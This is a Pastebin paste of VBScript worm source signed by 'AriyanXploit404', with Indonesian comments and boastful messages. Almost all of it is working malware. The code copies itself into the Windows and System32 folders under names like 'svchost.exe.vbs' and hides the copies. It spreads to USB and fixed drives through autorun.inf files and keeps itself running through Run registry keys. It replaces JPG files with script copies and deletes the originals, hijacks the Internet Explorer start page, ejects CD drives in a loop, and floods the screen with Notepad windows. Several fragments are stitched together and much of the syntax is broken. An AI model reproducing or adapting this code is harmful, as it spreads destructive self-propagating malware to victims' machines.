Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- On error resume next
- dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
- atr = “[autorun]”&vbcrlf&”shellexecute=wscript.exe svchost.exe.vbs”
- set fs = createobject(“Scripting.FileSystemObject”)
- set mf = fs.getfile(Wscript.ScriptFullname)
- dim text,size
- size = mf.size
- check = mf.drive.drivetype
- set text=mf.openastextstream(1,-2)
- do while not text.atendofstream
- mysource=mysource&text.readline
- mysource=mysource & vbcrlf
- loop
- do
- Set winpath = fs.getspecialfolder(0)
- set tf = fs.getfile(winpath & “\svchost.exe.vbs”)
- tf.attributes = 32
- set tf=fs.createtextfile(winpath & “\svchost.exe.vbs”,2,true)
- tf.write mysource
- tf.close
- set tf = fs.getfile(winpath & “\svchost.exe.vbs”)
- tf.attributes = 39
- for each flashdrive in fs.drives
- If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
- set tf=fs.getfile(flashdrive.path &”\svchost.exe.vbs”)
- tf.attributes =32
- set tf=fs.createtextfile(flashdrive.path &”\svchost.exe.vbs”,2,true)
- tf.write mysource
- tf.close
- set tf=fs.getfile(flashdrive.path &”\svchost.exe.vbs”)
- tf.attributes =39
- set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
- tf.attributes = 32
- set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
- tf.write atr
- tf.close
- set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
- tf.attributes=39
- end if
- next
- set rg = createobject(“WScript.Shell”)
- rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\svchost.exe.vbs”
- rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,””
- rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
- if check <> 1 then
- Wscript.sleep 100000
- end if
- loop while check<>1
- set sd = createobject(“Wscript.shell”)
- sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
- reg add
- hkey_local_machine\software\microsoft\windows\currentversionrun\vWINDOWsAPI\t
- reg_sz/d c:windowswimn32.bat/f
- reg add
- hkey_current_user\software\microsoft\windows\currentversionrun\vCONTROLexit\t
- reg_sz/d c:windowswimn32.bat/f
- do while year(now) >= 2021
- WScript.sleep 20000
- next
- Sub serangan_jpg(target)
- on error resume next
- set ftarget=fso.GetFile(target)
- set fsource = fso.GetFile(Wscript.ScriptFullName)
- ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”)
- set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) & “jpeg”)
- fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,”.”)) & “jpg ” & “.vbs”)
- ftarget.Delete
- ftarget.Close
- fsource.Close
- End Sub
- Sub carifilejpg(folder)
- For Each filetarget in fso.GetFolder(folder).Files
- If (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget)
- Next
- Sub serangan_drive()
- Set fso = CreateObject(”Scripting.FileSystemObject”)
- Set Drives=fso.drives
- adaflashdisk = False
- For Each drive in Drives
- If drive.isready Then
- fsource.Copy(drive & “” & “Ariyan.vbs”)
- If drive.DriveType = 1 And drive.DriveLetter > “C:” Then adaflashdisk = True
- End If
- Next
- If adaflashdisk = True Then
- set fileautorun = fso.CreateTextFile(drive.DriveLetter & “” & “autorun.inf”,False)
- fileautorun.WriteLine(”[AUTORUN]“)
- fileautorun.WriteLine(”RUN=Ariyan.vbs”)
- End If
- End Sub
- Sub serangan_ie()
- If (regedit.RegRead(”HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMainStart
- Page”)<>”c:windowssystem32wolio.html”) Then
- regedit.RegWrite “HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMainStart
- Page”,”c:windowssystem32wolio.html”
- End If
- End Sub
- next
- Sub buat_html()
- set filehtml = fso.CreateTextFile(”c:windowssystem32Ariyan.html”,True)
- filehtml.WriteLine(””)
- filehtml.WriteLine(””)
- filehtml.WriteLine(”Hacked By AriyanXploit404”)
- filehtml.WriteLine(””)
- filehtml.WriteLine(””)
- filehtml.WriteLine(””)
- filehtml.WriteLine(””)
- filehtml.WriteLine(””)
- filehtml.WriteLine(” Kemampuan Meretasku Diakui Karena Dendam Membara “)
- filehtml.WriteLine(””)
- filehtml.WriteLine(””)
- End Sub
- Sub serangan_folder(foldername)
- next
- dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,
- filehtml, fileautorun
- dim adaflashdisk
- set fso = CreateObject(”Scripting.FileSystemObject”)
- set fsource = fso.GetFile(Wscript.ScriptFullName)
- set regedit=CreateObject(”WScript.Shell”)
- myfolder = Left(fsource,InStrRev(fsource,””))
- ‘ Copy-kan diri ke “c:windowssystem32″
- fsource.Copy(”c:windowssystem32wolio.vbs”)
- ‘ Cari dan infeksi file JPG didalam folder
- carifilejpg(myfolder)
- ‘ Copy-kan diri di sub folder yang ada
- serangan_folder(myfolder)
- ‘ Regitry
- if
- (regedit.RegRead(”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunWolio”)<>”c:windowssystem32Ariyan.vbs”) Then
- regedit.RegWrite
- “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunAriyan”,”c:windowssystem32Ariyan.vbs”
- End If
- ‘ Copy-kan diri ke semua drive aktif
- serangan_drive()
- ‘ Buat file Ariyan.html
- buat_html()
- ‘ Ubah Start Page di Internet Explorer
- serangan_ie()
- Set oWMP = CreateObject("WMPlayer.OCX.7")
- Set colCDROMs = oWMP.cdromCollection
- do
- if colCDROMs.Count >= 1 then
- For i = 0 to colCDROMs.Count - 1
- colCDROMs.Item(i).Eject
- Next
- For i = 0 to colCDROMs.Count - 1
- colCDROMs.Item(i).Eject
- Next
- End If
- wscript.sleep 5000
- loop
- End Sub
- next
- option explicit
- dim wshshell
- set wshshell=wscript.createobject(“wscript.shell”)
- dim x
- for x = 1 to 100000000
- wshshell.run “tourstart.exe”
- next
- End Sub
- next
- set wshshell = wscript.CreateObject("wScript.Shell")
- dim n
- for n = 1 to 100000000
- wshshell.run "Notepad"
- wscript.sleep 400
- wshshell.sendkeys "H"
- wscript.sleep 100
- wshshell.sendkeys "a"
- wscript.sleep 120
- wshshell.sendkeys "c"
- wscript.sleep 200
- wshshell.sendkeys "k"
- wscript.sleep 100
- wshshell.sendkeys "e"
- wscript.sleep 140
- wshshell.sendkeys "d"
- wscript.sleep 100
- wshshell.sendkeys " "
- wscript.sleep 50
- wshshell.sendkeys "B"
- wscript.sleep 120
- wshshell.sendkeys "y"
- wscript.sleep 170
- wshshell.sendkeys " "
- wscript.sleep 100
- wshshell.sendkeys "A"
- wscript.sleep 50
- wshshell.sendkeys "r"
- wscript.sleep 120
- wshshell.sendkeys "i"
- wscript.sleep 160
- wshshell.sendkeys "y"
- wscript.sleep 200
- wshshell.sendkeys "a"
- wscript.sleep 100
- wshshell.sendkeys "n"
- wscript.sleep 100
- wshshell.sendkeys "X"
- wscript.sleep 100
- wshshell.sendkeys "p"
- wscript.sleep 100
- wshshell.sendkeys "l"
- wscript.sleep 100
- wshshell.sendkeys "o"
- wscript.sleep 100
- wshshell.sendkeys "i"
- wscript.sleep 100
- wshshell.sendkeys "t"
- wscript.sleep 100
- wshshell.sendkeys "4"
- wscript.sleep 100
- wshshell.sendkeys "0"
- wscript.sleep 100
- wshshell.sendkeys "4"
- End If
- End Sub
- next
- set sd = createobject(“Wscript.shell”)
- sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
- msgbox “Hacked By AriyanXploit404” & vbcrlf & _
- “Dunia Tersaji Diatas Piring Dan Kau Hanya Perlu Mengambilnya Saja” & vbcrlf & _
- “Virus Ariyan Tipe Omega” & vbcrlf & _
- “Virus Project Secret Dari AriyanXploit404” & vbcrlf & _
- vbcrlf & vbcrlf & _
- ” Namanya Baru Pemula Ya gitu deh Kan Berniat Jadi Legenda Xixixi >//w//< ” & vbcrlf & vbcrlf & _ “>//x//<”
- %SystemRoot%\System32\notepad.exe
- Set wshShell = wscript.CreateObject(“WScript.Shell”)
- do
- wscript.sleep 100
- wshshell.sendkeys “HACKED BY ARIYANXPLOIT404”
- next
- Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd,oldname,newname,rgname
- Set fs = createobject("Scripting.FileSystemObject")
- Set wn = WScript.CreateObject("WScript.Network")
- Set mf = fs.getfile(Wscript.ScriptFullname)
- oldname=CStr(fs.getfilename(Wscript.ScriptFullname))
- newname = wn.ComputerName & ".vbs"
- rgname = Replace(newname,".vbs","")
- atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe Ariyan Virus Type : Omega.vbs"
- dim text,size
- size = mf.size
- check = mf.drive.drivetype
- Set text=mf.openastextstream(1,-2)
- do while not text.atendofstream
- mysource=mysource&text.readline
- mysource=mysource & vbcrlf
- Loop
- mysource=Replace(mysource,oldname,newname)
- do
- Set winpath = fs.getspecialfolder(0)
- Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
- tf.attributes = 32
- Set tf=fs.createtextfile(winpath & "\SYSTEM32\" & newname,2,true)
- tf.write mysource
- tf.close
- Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
- tf.attributes = 39
- For each flashdrive in fs.drives
- If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" Then
- Set tf=fs.getfile(flashdrive.path &"\Ariyan Virus Type : Omega.vbs")
- tf.attributes =32
- Set tf=fs.createtextfile(flashdrive.path &"\Ariyan Virus Type : Omega.vbs",2,true)
- tf.write mysource
- tf.close
- Set tf=fs.getfile(flashdrive.path &"\Ariyan Virus Type : Omega.vbs")
- tf.attributes =39
- Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
- tf.attributes = 32
- Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
- tf.write atr
- tf.close
- Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
- tf.attributes=39
- End If
- next
- Set rg = createobject("WScript.Shell")
- rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
- rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked By AriyanXploit404" & Replace(".vbs","")
- if check <> 1 then
- Wscript.sleep 120000
- End if
- loop while check<>1
- Set sd = createobject("Wscript.shell")
- sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
- AriyanXploit404@love-machine:/media/disk$ cat autorun.inf
- shellexecute=wscript.exe Omega.vbsAriyanXploit404@love-machine:/media/disk$
Add Comment
Please, Sign In to add comment